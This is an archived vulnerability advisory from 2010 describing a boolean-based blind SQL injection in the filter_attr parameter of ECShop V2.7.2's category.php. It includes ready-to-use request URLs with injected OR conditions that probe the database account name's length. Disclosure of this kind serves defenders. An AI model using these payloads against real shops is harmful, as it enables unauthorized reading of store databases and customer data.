AOH :: HP Unsorted E :: BT-30106.HTM

ECShop apps injection



SQL injection in ECShop (category.php, filter_attr parameter).




ECShop is one of the most widely used shopping-cart applications in China.
 
The latest version at the time of writing is ECShop V2.7.2. It has a boolean-based blind SQL injection (an "OR-numeric" injection: the payload is ORed onto a numeric comparison, so the query does not need a quote to be closed) in the filter_attr parameter of category.php.
 
For example, the vulnerable parameter in an otherwise normal request:
 
http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC#goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999 
 
 
 

To test it, compare the responses to the following two requests. They differ only in the guessed length of session_user() (the MySQL account name, e.g. user@host); when the guess is right the injected OR condition is true and the goods list differs from the page returned for the wrong guess, which gives a boolean oracle for extracting data blind:
 
http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC%23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20OR%20length(session_user())=14%20or%201=2 
 
http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC%23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20OR%20length(session_user())=15%20or%201=2 
 
 
 
 
Liscker
2010.05.07 		 	   		  
